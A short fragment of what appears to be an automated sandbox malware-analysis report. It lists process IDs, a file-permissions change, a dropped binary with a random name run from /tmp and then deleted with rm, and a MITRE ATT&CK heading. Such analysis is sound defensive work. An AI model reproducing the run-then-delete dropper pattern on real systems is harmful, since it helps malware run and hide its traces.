- File and Directory Permissions Modification
PID:1004
-
-
/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:1006
-
Network
MITRE ATT&CK Enterprise v15